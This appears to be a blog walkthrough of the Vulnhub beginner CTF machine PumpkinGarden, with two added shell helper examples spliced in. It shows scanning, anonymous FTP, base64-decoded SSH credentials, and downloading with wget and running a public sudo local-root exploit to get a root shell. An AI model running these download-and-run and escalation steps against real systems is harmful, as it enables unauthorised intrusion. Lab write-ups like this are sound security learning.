Mission-Pumpkin v1.0: PumpkinGarden Walkthrough

Mr. Robot, published in InfoSec Adventures · Jul 14, 2019 · 7 min read

Description from Vulnhub:

Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinGarden is Level 1 of series of 3 machines under Mission-Pumpkin v1.0. The end goal of this CTF is to gain access to PumpkinGarden_key file stored in the root account.

Scanning

Since this box is geared towards absolute beginners, I will try to explain everything in more depth. To find the running services, we have to scan the machine with a tool like nmap. I used multiple switches to get a better result: -A means we want everything, -sV means version enumeration, -sC means running the default scripts, and -p- means that we would like to scan the whole port range from 0 to 65535. This way, we can be pretty sure that we don’t miss anything important.

root :: ~ » nmap -A -sV -sC -p- 192.168.42.40
Nmap scan report for Pumpkin (192.168.42.40)
Host is up (0.00018s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.42.9
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
| 2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
| 256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_ 256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (ED25519)
MAC Address: 08:00:27:20:A9:84 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Anonymous FTP

The very first thing that pops up is that anonymous login is allowed on port 21, so we can log in without knowing any credentials. Just type anonymous for the name and leave the password field blank.

root :: Vulnhub/PumpkinGarden » ftp 192.168.42.40
Connected to 192.168.42.40.
220 Welcome to Pumpkin's FTP service.
Name (192.168.42.40:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 113 4096 Jun 11 20:28 .
drwxr-xr-x 2 0 113 4096 Jun 11 20:28 ..
-rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (88 bytes).
226 Transfer complete.
88 bytes received in 0.00 secs (1.6785 MB/s)
ftp> exit
221 Goodbye.
root :: Vulnhub/PumpkinGarden » cat note.txt
Hello Dear!
Looking for route map to PumpkinGarden? I think jack can help you find it.

I found a note.txt file and downloaded it to my local machine with the get command. The note contains a username, but on its own that is nothing we can go on.

The web server

I decided to visit the web server and explore it a little bit. The site was very basic. However, the text suggests we should look under the hood.

Mission-Pumpkin website.

Let’s view the source code to see if we can find anything.

Hidden comment in the source code.

Alright, it says the Pumpkin images may help us find the way to the route map. This suggests checking out the /img directory on the server. That directory contained another directory called hidden_secret, which in turn contained a clue.txt file. Inside the file was this text:

c2NhcmVjcm93IDogNVFuQCR5

For beginners, this might be a little confusing, but this is base64 encoded text. It’s confusing because base64 strings typically end with one or two equal signs (the padding), and this one doesn’t. You can easily decode it from the terminal, like this:

root :: ~ » echo c2NhcmVjcm93IDogNVFuQCR5 | base64 -d
scarecrow : 5Qn@$y

SSH access

The decoded text looks like a “username : password” combination. I tried it against SSH and it was a success.

root :: ~ » ssh scarecrow@192.168.42.40 -p 3535
--------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
--------------------------------------------------------------------
scarecrow@192.168.42.40's password:
Last login: Sun Jul 14 13:48:22 2019 from kali
scarecrow@Pumpkin:~$ ls -la
total 28
drwx------ 2 scarecrow scarecrow 4096 Jun 11 21:50 .
drwxr-xr-x 5 root root 4096 Jun 11 18:25 ..
-rw------- 1 scarecrow scarecrow 117 Jun 13 00:36 .bash_history
-rw-r--r-- 1 scarecrow scarecrow 220 Jun 11 18:24 .bash_logout
-rw-r--r-- 1 scarecrow scarecrow 3637 Jun 11 18:24 .bashrc
-rw-r--r-- 1 root root 167 Jun 11 21:24 note.txt
-rw-r--r-- 1 scarecrow scarecrow 675 Jun 11 18:24 .profile

As you can see, there’s another note.txt file in the home directory.

scarecrow@Pumpkin:~$ cat note.txt
Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)!
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.
scarecrow@Pumpkin:~$

Sweet! I checked the /etc/passwd file and identified 3 users on the machine; one of them was goblin.
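
For anyone following along, here is how that /etc/passwd check can be done without reading the file by eye. This is an added example, not part of the original walkthrough; the passwd lines are constructed sample data, not the machine’s real file, and the function names are mine.

```shell
# Added example (not from the original walkthrough): pick out the accounts that
# can actually log in from passwd-format data, which is what a manual read of
# /etc/passwd is really after. The sample below is constructed for this example
# and is not the machine's real /etc/passwd.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
jack:x:1000:1000::/home/jack:/bin/bash
scarecrow:x:1001:1001::/home/scarecrow:/bin/bash
goblin:x:1002:1002::/home/goblin:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin'

# Reads passwd lines on stdin; prints "user uid home" for regular users
# (UID >= 1000, excluding the 65534 "nobody" account) whose shell is not
# nologin/false. Field 3 is the UID, field 6 the home directory, field 7 the
# login shell.
list_login_users() {
    awk -F: '$3 >= 1000 && $3 != 65534 && $7 !~ /(nologin|false)$/ { print $1, $3, $6 }'
}

# Counts the same set of users for the passwd text passed as $1.
count_login_users() {
    printf '%s\n' "$1" | list_login_users | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_PASSWD" | list_login_users
echo "login users: $(count_login_users "$SAMPLE_PASSWD")"
```

On a real box you would run `list_login_users < /etc/passwd`; the system accounts with nologin shells are filtered out, which is why a quick eyeball of the file tends to miss or miscount users.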

Privilege escalation

I quickly switched users using the given credentials. I navigated to goblin’s home directory and found another note file.

scarecrow@Pumpkin:~$ su goblin
Password:
goblin@Pumpkin:/home/scarecrow$ cd ..
goblin@Pumpkin:/home$ cd goblin/
goblin@Pumpkin:~$ ls -la
total 28
drwx------ 2 goblin goblin 4096 Jun 13 00:49 .
drwxr-xr-x 5 root root 4096 Jun 11 18:25 ..
-rw------- 1 goblin goblin 32 Jun 11 21:55 .bash_history
-rw-r--r-- 1 goblin goblin 231 Jun 11 21:50 .bash_logout
-rw-r--r-- 1 goblin goblin 3637 Jun 11 18:25 .bashrc
-rw-r--r-- 1 root root 328 Jun 11 21:22 note
-rw-r--r-- 1 goblin goblin 675 Jun 11 18:25 .profile
goblin@Pumpkin:~$ cat note
Hello Friend! I heard that you are looking for PumpkinGarden key.
But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.
Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh
goblin@Pumpkin:~$

It really can’t be easier than that… We were given a link to a shell script which, judging by the URL, looks like an exploit. It might help us become root!

Getting root access

I spent a couple of minutes reading the script. It turns out that it needs a file we have write permissions on as its parameter. The script isn’t complicated, so feel free to read it through and understand it. It’s the best way to learn new things!

We need a directory where we can write files. I usually use one of these three directories: /tmp, /var/tmp and /dev/shm. The next step is to get the exploit onto the machine somehow. Since wget is installed, we can use it to download the file. I chose the /dev/shm directory because /tmp was frequently cleaned up and my files disappeared.

goblin@Pumpkin:~$ cd /dev/shm
goblin@Pumpkin:/dev/shm$ wget https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh
--2019-07-14 17:11:19-- https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh
Resolving www.securityfocus.com (www.securityfocus.com)... 34.201.211.24, 54.164.180.208, 64:ff9b::36a4:b4d0, ...
Connecting to www.securityfocus.com (www.securityfocus.com)|34.201.211.24|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://downloads.securityfocus.com/vulnerabilities/exploits/38362.sh [following]
--2019-07-14 17:11:21-- https://downloads.securityfocus.com/vulnerabilities/exploits/38362.sh
Resolving downloads.securityfocus.com (downloads.securityfocus.com)... 52.7.56.121, 54.209.252.161, 64:ff9b::36d1:fca1, ...
Connecting to downloads.securityfocus.com (downloads.securityfocus.com)|52.7.56.121|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 460 [application/x-sh]
Saving to: ‘38362.sh’
100%[=================================================================>] 460 --.-K/s in 0s
2019-07-14 17:11:23 (110 MB/s) - ‘38362.sh’ saved [460/460]

Once you have downloaded the file, the next step is to make it executable. Then, create an empty file with the touch command. Finally, the moment of truth: execute the script and pass the file name as the parameter. If everything went well, you are presented with a root shell.

goblin@Pumpkin:/dev/shm$ chmod +x 38362.sh 
goblin@Pumpkin:/dev/shm$ touch herewego
goblin@Pumpkin:/dev/shm$ ./38362.sh herewego
Tod Miller Sudo local root exploit
by Slouching
automated by kingcope
ALEX-ALEX
root@Pumpkin:/tmp# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

The flag

Finally, we can print out the flag in the root user’s home directory. Note that it’s also base64 encoded!

root@Pumpkin:/tmp# cd
root@Pumpkin:~# ls -la
total 36
drwx------ 3 root root 4096 Jun 13 01:20 .
drwxr-xr-x 22 root root 4096 Jun 11 18:14 ..
-rw-r--r-- 1 root root 22 Jun 13 01:21 .bash_logout
-rw-r--r-- 1 root root 3106 Jun 11 18:30 .bashrc
drwx------ 2 root root 4096 Jun 11 21:30 .cache
-rw------- 1 root root 17 Jun 13 01:19 .nano_history
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw-r--r-- 1 root root 25 Jun 13 00:23 PumpkinGarden_Key
-rw-r--r-- 1 root root 66 Jun 11 21:59 .selected_editor
root@Pumpkin:~# cat PumpkinGarden_Key
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:~# cat PumpkinGarden_Key | base64 -d
Congratulations!
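
The same decoding step in scripted form, as an added example that is not part of the original walkthrough: it shows why the clue from clue.txt came out without the familiar trailing equal signs while the key above carries two, and it pads input whose padding was stripped so that base64 -d still accepts it. The two strings are taken from this page; the helper names are my own.

```shell
# Added example (not from the original walkthrough): decode base64 that may be
# missing its '=' padding, and show why the clue string needed no padding while
# the key string needed two '=' signs.

# Append '=' until the length is a multiple of 4. GNU `base64 -d` rejects
# input whose length is not a multiple of 4 with "invalid input".
pad_b64() {
    s=$1
    while [ $(( ${#s} % 4 )) -ne 0 ]; do
        s="${s}="
    done
    printf '%s' "$s"
}

# Decode a base64 string, tolerating stripped padding.
b64_decode() {
    pad_b64 "$1" | base64 -d
}

# Padding an encoder emits for n raw bytes: every 3 bytes become 4 characters,
# so only a leftover of 1 or 2 bytes needs 2 or 1 '=' respectively.
expected_padding() {
    case $(( $1 % 3 )) in
        0) echo 0 ;;
        1) echo 2 ;;
        2) echo 1 ;;
    esac
}

# Byte length of a string (printf '%s' avoids counting a trailing newline).
byte_len() {
    printf '%s' "$1" | wc -c | tr -d ' '
}

# The clue from clue.txt: 18 bytes of plaintext -> 24 characters, no padding.
clue='c2NhcmVjcm93IDogNVFuQCR5'
plain=$(b64_decode "$clue")
echo "$plain"   # scarecrow : 5Qn@$y
echo "bytes=$(byte_len "$plain") padding=$(expected_padding "$(byte_len "$plain")")"

# The key: 16 bytes of plaintext -> 24 characters, two '=' signs. The padding
# is stripped here on purpose to show that decoding still works once re-padded.
key_unpadded='Q29uZ3JhdHVsYXRpb25zIQ'
echo "$(b64_decode "$key_unpadded")"   # Congratulations!
```

The rule of thumb: a base64 string only ends in `=` when the plaintext length is not a multiple of 3, so an unpadded string is not a sign that the encoding is something else.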

Before you go

Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interests find it! Feedback is always welcome! 🙏


Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.